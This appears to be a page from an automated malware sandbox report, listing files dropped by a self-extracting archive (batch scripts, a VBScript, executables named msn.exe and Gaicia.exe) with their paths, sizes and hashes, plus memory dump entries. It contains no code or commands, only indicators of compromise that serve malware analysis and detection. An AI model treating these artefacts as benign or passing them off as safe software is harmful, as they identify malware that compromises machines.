4ca8a5cd200eaf8d8a023c47e7a279e41279c045bf567b81f95e93ca25d5a51dec2786de98efa5b907ec5633c8400e497f6bcaf636d4591d7c42e21ec3039ad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd

Filesize
1KB

MD5
20e8b5c5e8779c45d0cffeb223e1b4ee

SHA1
e33e7c02fc54766be39b7844f31baae5d474c27e

SHA256
5412e0c39e7967064c825e6d487f41d356e423f2b60a272213b0909dae1e22b0

SHA512
03c707911e6fe9bd190fe645b0743f7e65a8b0175aee8367a84203be9f213b2c4135a360aaeea63469e76d3dc31a9563a9dd2182f3b24c5489c7addd2d184673

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cpa.cmd

Filesize
37B

MD5
d102d7237ff395378654c928b119dff0

SHA1
9ac16a1749212cc8e3cf6606fc7fcbd05f750c61

SHA256
702527cd5541e09286da5e1f47f829798c6e703b1c72c97db5570d1744337f48

SHA512
cc9a17882cc48c541bd3561d2a71a4a3b75b43e07050a0c5a36e02aba78b647c6d87e392a99c60373a7ec7d034031d7cfadef06e75c91cc2f19ff280207a15f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd

Filesize
110B

MD5
83b98633c669411050739335068d2755

SHA1
de25c70f8b5845375efd44ae5e4386380fe27ead

SHA256
b057b6c505f2257015ca2efbb6ea86ffe0357ee7cae262191349a208ede27639

SHA512
920421a1287091d699bee5480c67f906626f5ff8b4ef6629123a99828e7c6a78ddecc814320b9529f105ed60126df481ec8086173adf1b883d674e6ba3a9364f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe

Filesize
307KB

MD5
c6c09a8eed83a4248a697bc68a54c8fb

SHA1
8a3d18a63ae6527cbeb8fdd68e23123d0789a5e7

SHA256
07f42ffa0fd309f02cf1ca67eb2e837882b08200283db692020229f44a2b9cc2

SHA512
7a9af4475106f6284f4cb130bb47e16911d0a76c9571dd8b15022c3cfff2f4e634e5aa91b70945e6c0bb69c1501f9fd0fe455f1545cf3bb14b94e7a229bdb6ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe

Filesize
325KB

MD5
db00a2cd92f64147569082cfbd06b4db

SHA1
ad598762f1ab70aa78c5e51ccb2f49b1ea5894f2

SHA256
b8c55a2d29d1691cf0a56dfb56a238e01b9e73a8d9a40111edfead52f9296cab

SHA512
179f69b365a6c385442851550d5dc614ea48af8dc9a1f70fdd9a21a521c8a68ee65fcd5f47d8cba3968f28f78c7e47e50b6d3f647f2423a39b65df73ebb51f4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\runonce.cmd

Filesize
11KB

MD5
2499bcde9656b2401e95fe6c6d4fe268

SHA1
dc7bf897affd9f8e4f870be5fa102009a02f22ed

SHA256
3e0c8d48799b9fb4c275a8332a009d6d0bb0a6315343b45aad43c20cfbd4e2b6

SHA512
fa3eb6078510a2b70309d279157c60a5ad60c970c35906224ca5a3c9d626ef7b2d2d97fe75a06855a137da80a339ba499e0e4bc8f7fbf88882390710b25289b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tool.cmd

Filesize
3KB

MD5
4e8f8a4f4a836c587f77d3f294286692

SHA1
b6ae662e53f5d08f7cbc0c06a08d47930dbaf0cc

SHA256
b0367e47ed6fee2d6843d240ac7e83b932466ddd13cc57d971d6cb8e8b2c55a5

SHA512
25dfc1a3b4bd4b5c3263f64ae36127bc141138d922316b97bc96c5edd8b84a5b6193b7c687c89ad554d8abee68bc4aad52632a3d98e220352515e380cd749874

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs

Filesize
970B

MD5
4c63083996b714d331f877a7bb204216

SHA1
de8807c42284e99ba308ea8ad01cc3f4a8894b0a

SHA256
34666e9c92a0260d690f262a23e89a9b4ffa0c5c25178d0f2c1720f4b8d8b569

SHA512
f83b239bf307a4864d5f0fcb5c5052b0330ced35af767c48171ca5ec74949aa53219bfe226b9813f0408d979fa0774df89687da1ad36c49ee2ed12e40c842c1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe

Filesize
205KB

MD5
542577c0ebe9f64e7923e8f6b3f7fe47

SHA1
378e47a52aa96859ec8a50939e7ae45ccc91741e

SHA256
82fd4883c82306457feec455e14e38dc2e3c9d0fab3f6cb736721aa350b4abed

SHA512
fa57a2b2f25f1f7d0b3ca1a82a7a65085037938f9eb6ea5717e1ce3cd10f33085a8a05e2103a13ff2d9e2ad98cbd906953c102a54d447af23a6125589a307445

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe

Filesize
318KB

MD5
b26c6fc909d5b8885598b40f3a14db35

SHA1
1504910e5b18a89f6ceecd00b40e313c72fde4d3

SHA256
60aec1e34e6812999e941e651058a170d9821e8d9b6e29df932c4a5c696648f3

SHA512
5e92ca7f1c73d3fbfedd38e94e9669684c7efff653a317c4945c314f08c4fc001e9252b8a46b5df9e97f0a7179f89310d74a7fe4e3dd43d7b3d5db672e17f78d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe

Filesize
125KB

MD5
06df972e024bdeefcb01e2cebc599924

SHA1
9a9c0b18a4edbc2afc3fcdd4f9172c976f38ad44

SHA256
cc5507656696ec6349c4df048839318ad70ddefa14a6e6c968210c08981bfe99

SHA512
59d25be864449502f2aa7ea793482bae8c16af342e8dd7cbb94e4ec272a9cd1e1eee3e8067a8e47dcf6a2900afdd3835cffdb643d05956081d8eb9c4a06f4f03

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe

Filesize
797KB

MD5
cab7920419ef7ed1e22e9fc4da013bd1

SHA1
48fc6488e928b4fa5ee75ca74ed1548e316bd6db

SHA256
e96c8d5cc0a23032da47280e8835161a959de6965b696328c8a0edf160c3f208

SHA512
8393a0160a8e58169554528562e40cf3d4318320475d53377b24dbba42a83026e390a2bb272cdcb89e4d851aac0e75f9cbda65440258569662711f9d1eadc4f0

Download Submit
memory/976-122-0x0000000000400000-0x00000000004D1000-memory.dmp

Filesize
836KB

Download
memory/976-112-0x0000000002230000-0x0000000002231000-memory.dmp

Filesize
4KB

Download
memory/3792-125-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4660-126-0x0000000000400000-0x00000000004D1000-memory.dmp

Filesize
836KB

Download
memory/4660-124-0x00000000022C0000-0x00000000022C1000-memory.dmp

Filesize
4KB

Download
memory/4660-140-0x0000000000400000-0x00000000004D1000-memory.dmp

Filesize
836KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads